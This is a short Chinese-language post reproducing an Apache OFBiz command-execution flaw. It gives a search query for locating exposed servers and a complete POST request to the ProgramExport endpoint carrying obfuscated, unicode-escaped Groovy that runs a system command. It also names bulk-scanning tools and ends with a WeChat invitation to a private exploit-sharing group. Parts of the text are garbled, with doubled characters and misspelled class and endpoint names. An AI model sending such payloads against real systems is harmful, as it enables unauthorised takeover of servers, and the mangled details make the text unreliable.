0x01 產(chǎn)品簡介

Apache OFBiz是一個電子商務(wù)平臺，用于構(gòu)建大中型企業(yè)級、跨平臺、跨數(shù)據(jù)庫、跨應(yīng)用服務(wù)器的多層、分布式電子商務(wù)類應(yīng)用系統(tǒng)。是美國阿帕奇(Apache)基金會的一套企業(yè)資源計劃(ERP)系統(tǒng)。該系統(tǒng)提供了一整套基于Java的Web應(yīng)用程序組件和工具。

0x02 漏洞概述

Apache OFBiz 18.12.14之前版本存在命令執(zhí)行漏洞，該漏洞源于org.apache.otbiz.webapp.control.ControlFiter類對路徑(請求URL中的特殊字符(如;、%2e)限制不當導(dǎo)致攻擊者能夠繞過后臺功能點的過濾器驗證，并通過webtools/control/ProgramExpor接囗的編程導(dǎo)出功能執(zhí)行任意Groovy代碼獲取系統(tǒng)權(quán)限。

0x03 搜索語法

app="Apache_OFBiz"

0x04 漏洞復(fù)現(xiàn)

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: your-ip
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Content-Type: application/x-www-form-urlencodedgroovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

0x05 工具批量

nuclei

afrog

xray

POC腳本獲取

請使用VX掃一掃加入內(nèi)部POC腳本分享圈子